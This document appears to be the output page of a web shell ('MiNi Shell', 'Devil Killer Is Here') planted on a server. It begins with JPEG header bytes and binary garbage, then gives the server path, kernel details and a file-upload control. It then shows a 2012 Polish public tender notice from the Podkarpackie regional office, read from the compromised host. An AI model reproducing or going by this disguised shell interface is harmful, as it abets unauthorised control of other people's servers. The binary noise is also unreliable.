JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120119/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120119/17448-N-2012.html

<p class="kh_header"><b>Rzeszów: Opracowanie merytoryczne oraz wydruk i dostawa czterech numerów biuletynu informacyjnego Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013 pt. Inwestujemy w rozwój.</b><br>
<b>Numer ogłoszenia: 17448 - 2012; data zamieszczenia: 19.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Marszałkowski Województwa Podkarpackiego w Rzeszowie , al. Łukasza Cieplińskiego 4, 35-010 Rzeszów, woj. podkarpackie, tel. 017 8501776, faks 017 8501701.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.podkarpackie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie merytoryczne oraz wydruk i dostawa czterech numerów biuletynu informacyjnego Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013 pt. Inwestujemy w rozwój..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie merytoryczne oraz wydruk i dostawa czterech numerów biuletynu informacyjnego Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013 pt. Inwestujemy w rozwój.
I. Zawartość numerów
Biuletyn będzie zawierał informacje związane z wdrażaniem RPO WP, w tym m.in.:
- informacje bieżące nt. postępów we wdrażaniu programu
- wywiady np. z osobami z kadry zarządzającej RPO WP, z beneficjentami, 
z ekspertami, ze znanymi osobami związanymi z regionem,
- prezentację dobrych praktyk (m.in. w formie opisów, wywiadów z beneficjentami, ich nieodłączną częścią będą fotografie)
- artykuły eksperckie
- rozrywkę (krótki komiks/rebus/krzyżówka/inne)
- drobny gadżet (opis w pkt. V SOPZ)
Szczegółowa zawartość numerów oraz harmonogram prac nad wydaniem każdego numeru Biuletynu uzgodnione zostanie pomiędzy Zamawiającym a Wykonawcą w trakcie realizacji zawartej umowy. Biuletyn będzie stanowił kontynuację biuletynu informacyjnego Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013 pn. Inwestujemy w rozwój, wydawanego w 2010 i 2011 roku. Archiwalne numery biuletyn dostępne są na stronie www.rpo.podkarpackie.pl.
II. Zakres prac
1. Zakres prac obejmuje:
1) opracowanie merytoryczne, w tym:
a) zaplanowanie zawartości merytorycznej każdego numeru Biuletynu i przedłożenie jej do akceptacji Zamawiającego,
b) przygotowywanie własnych materiałów tekstowych - aktualności, artykułów, wywiadów w wymiarze ok. 4 tysięcy znaków na kolumnę (jedna strona wydawnictwa),
c) redagowanie tekstów otrzymanych od Zamawiającego.
2) opracowanie graficzne, w tym:
a) projekt układu graficznego, zgodnie z layoutem przekazanym przez Zamawiającego,
b) wykonanie i przygotowanie fotografii własnych oraz przygotowywanie do druku fotografii dostarczonych przez Zamawiającego,
c) przygotowanie infografik, wykresów i tabel.
3) skład i druk biuletynu, w tym: 
a) skład tekstów na kolumnach,
b) techniczne przygotowanie do druku, 
c) wykonanie plików ps,
d) druk o nakładzie 2 000 sztuk każdego numeru Biuletynu (łącznie 8 000 sztuk) , zgodnie z parametrami:
- objętość: 20 stron (razem z okładką),
- format A4,
- papier środka (16 stron): kreda 150 g/m2, mat,
- papier okładki (4 strony): kreda 250 g/m2, mat,
- oprawa zeszytowa (zszywacze), 
- lakier dyspersyjny na okładce,
- pełen kolor 4+4.
a) zakup i dostarczenie do Zamawiającego nagród dla 3 zwycięzców konkursów z każdego numeru biuletynu, tj. odtwarzacz MP3  o minimalnych parametrach:
- pojemność pamięci 4 GB
- wyświetlacz OLED
- zasilanie-akumulator
- odtwarzane formaty: MP3, WMA, ASF
- dodatkowe funkcje: radio, rec, słuchawki stereo
- ilość: 12 sztuk
b) dostawę i rozładunek całego nakładu biuletynu do siedziby Zamawiającego,
c) przekazanie biuletynu w wersji elektronicznej (format PDF) w celu zamieszczenia go na stronie Zamawiającego: www.rpo.podkarpackie.pl.

2. Szata graficzna Biuletynu musi zawierać elementy zgodne z Systemem Identyfikacji Wizualnej Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013, który zostanie przekazany Wykonawcy w dniu podpisania umowy.
3. Każdy numer będzie opatrzony:
- formułą Egzemplarz bezpłatny,
- formułą Biuletyn finansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013,
- znakami graficznymi: logo Narodowej Strategii Spójności z odniesieniem słownym do Programu Regionalnego, znak promocyjny województwa podkarpackiego z odniesieniem słownym PODKARPACKIE, flaga UE z odniesieniem słownym do Unii Europejskiej i Europejskiego Funduszu Rozwoju Regionalnego.
4. Każdy numer biuletynu będzie opatrzony numerem ISSN zgodnie z wymogami przewidywanymi przez Narodowy Ośrodek ISSN.

III. Terminy wykonania zamówienia
- Biuletyn numer 1 - wydany zostanie do dnia 27 kwietnia  2012 r.,
- Biuletyn numer 2 - wydany zostanie do dnia 30 czerwca 2012 r.,
- Biuletyn numer 3 - wydany zostanie do dnia 30 września 2012 r.,
- Biuletyn numer 4 - wydany zostanie do dnia 5 grudnia 2012 r. 
Pełne nakłady poszczególnych wydań Biuletynu zostaną w powyższych terminach dostarczone do siedziby Zamawiającego.

IV. Opis materiału promocyjnego dołączonego do każdego biuletynu:
Biuletyn nr 1 -  Notes samoprzylepny ze znacznikami w okładce kartonowej, okładka: karton 300g, nadruk: 4+4, lakier dyspersyjny,
- 1 x notes samoprzylepny: 70(klej) x 74 mm, 50 kartek
- papier offset 74g, biały
- nadruk na kartkach: 4+0
- 5 x foliowe znaczniki samoprzylepne w pięciu różnych kolorach, po 25 kartek, bez nadruku, 
- jednostkowo pakowane w woreczki celofanowe.

Biuletyn nr 2 - Podkładka korkowa, format: kwadrat 9,3 x 9,3 cm (zaokrąglone rogi) 
druk reklamowy: offset CMYK 4+0, wierzchnia warstwa: folia MAT, środek: tektura introligatorska, grubość 2 mm, spodnia warstwa: korek naturalny, grubość 0,8 mm, tolerancja na wykrojniku 2 mm.

Biuletyn nr 3 - Zakładka magnetyczna, karton 300g, druk i foliowanie dwustronne - pełen kolor dwustronnie + lakier matowy. Wymiary: min. 60 mm x 240 mm , po złożeniu 60x 175 mm. Języczek półokrągły o średnicy 13 mm.

Biuletyn nr 4 - Linijka drewniana dł. 20 cm, szer. ok. 2,5 cm, w kolorze drewna naturalnego, nadruk logotypów w pełnym kolorze.

Każdy z gadżetów zostanie opatrzony trwałym nadrukiem, zgodnie z wymogami Zamawiającego i przyklejony do drugiej strony biuletynu w sposób nie niszczący druku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.31.22.10-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy - w zakresie warunku udziału w postępowaniu, o którym mowa w pkt. III.3.1 ogłoszenia w celu ubiegania się o udzielenie zamówienia nie jest wymagane spełnianie przez wykonawców żadnych szczególnych wymogów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali (a w przypadku świadczeń okresowych lub ciągłych również wykonują) z należytą starannością co najmniej 3 usługi z których każda polegała łącznie na: 1) opracowaniu merytorycznym 2) opracowaniu graficznym 3) redakcji i przygotowaniu do druku publikacji o objętości minimum 20 stron (wraz z okładką), których tematyka dotyczyła funduszy unijnych o wartości minimum 40 000 zł brutto każda (przez wartość brutto usługi należy rozumieć wysokość honorarium uzyskanego przez wykonawcę za wykonanie tej usługi). Zamawiający dokona oceny spełniania przez wykonawcę wyżej wskazanego warunku udziału w postępowaniu według formuły spełnia/ nie spełnia - na podstawie analizy złożonych przez wykonawcę oświadczeń i dokumentów, o których mowa w pkt. III.4.1 ogłoszenia. Z treści załączonych do oferty wykonawcy oświadczeń i dokumentów mających na celu potwierdzenie spełniania przez niego warunku jak wyżej wynikać ma jednoznacznie, iż wykonawca ten warunek spełnia. Szczegółowy zakres informacji, spośród informacji zawartych w wykazach, o których mowa w pkt. III.4.1 ogłoszenia zawarty jest w SIWZ. Wykonawcy wspólnie ubiegający się o zamówienie (konsorcjum, spółka cywilna) muszą wykazać, że wyżej wskazany warunek udziału w postępowaniu spełnia jeden z wykonawców samodzielnie lub łącznie (kumulatywnie) wszyscy wykonawcy wchodzących w skład konsorcjum/ spółki cywilnej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy - w zakresie warunku udziału w postępowaniu, o którym mowa w pkt. III.3.3 ogłoszenia w celu ubiegania się o udzielenie zamówienia nie jest wymagane spełnianie przez wykonawców żadnych szczególnych wymogów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia, tzn. wykonawcy którzy dysponują/ będą dysponować zespołem, który zostanie wyznaczony do realizacji zamówienia, w skład którego wchodzić musi: 1) kierownik zespołu - redaktor - posiadający min. 3 lata doświadczenia w zakresie opracowywania oraz wydawania materiałów informacyjnych i promocyjnych dotyczących tematyki związanej z Unią Europejską, 2) 2 autorów tekstów posiadających doświadczenie w zakresie: - przeprowadzania wywiadów i redagowania tekstów, - przygotowywania tekstów o charakterze promocyjnym i informacyjnym, dotyczącym funduszy unijnych 3) grafik - w ciągu ostatnich 3 lat zaprojektował 3 wydawnictwa związane z wykorzystaniem Funduszy Europejskich, 4) fotograf - z minimum 3 letnim doświadczeniem w fotografii reportażowej. Zamawiający dokona oceny spełniania przez wykonawcę wyżej wskazanego warunku udziału w postępowaniu według formuły spełnia/ nie spełnia - na podstawie analizy złożonego przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu (wg załączonego wzoru - załącznik nr 2 do SIWZ). Z treści załączonego do oferty wykonawcy oświadczenia mającego na celu otwierdzenie spełniania przez niego warunku jak wyżej wynikać ma jednoznacznie, iż wykonawca ten warunek spełnia. Wykonawcy wspólnie ubiegających się o zamówienie (konsorcjum, spółka cywilna) wyżej wskazany warunek udziału w postępowaniu muszą spełniać osobno lub łącznie (kumulatywnie) wszyscy wykonawcy wchodzących w skład konsorcjum lub spółki cywilnej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy - w zakresie warunku udziału w postępowaniu, o którym mowa w pkt. III.3.5 ogłoszenia w celu ubiegania się o udzielenie zamówienia nie jest wymagane spełnianie przez wykonawców żadnych szczególnych wymogów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w pkt. III.4.3.1 ogłoszenia, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Doświadczenie wykonawcy w ilości zrealizowanych usług, polegających na merytorycznym opracowaniu biuletynów - 40</li>
<li>3 - Doświadczenie wykonawcy w ilości zrealizowanych usług, polegających na merytorycznym opracowaniu wydawnictw zwartych - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wrota.podkarpackie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Podkarpackiego w Rzeszowie, 35-010 Rzeszów, al. Łukasza Cieplińskiego 4, pok. nr 207..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2012 godzina 10:00, miejsce: Urząd Marszałkowski Województwa Podkarpackiego w Rzeszowie, 35-010 Rzeszów, al. Łukasza Cieplińskiego 4, pok. nr 207..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt: Wsparcie procesu wdrażania RPO WP poprzez działania o charakterze informacyjno-promocyjnym w 2012 roku..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com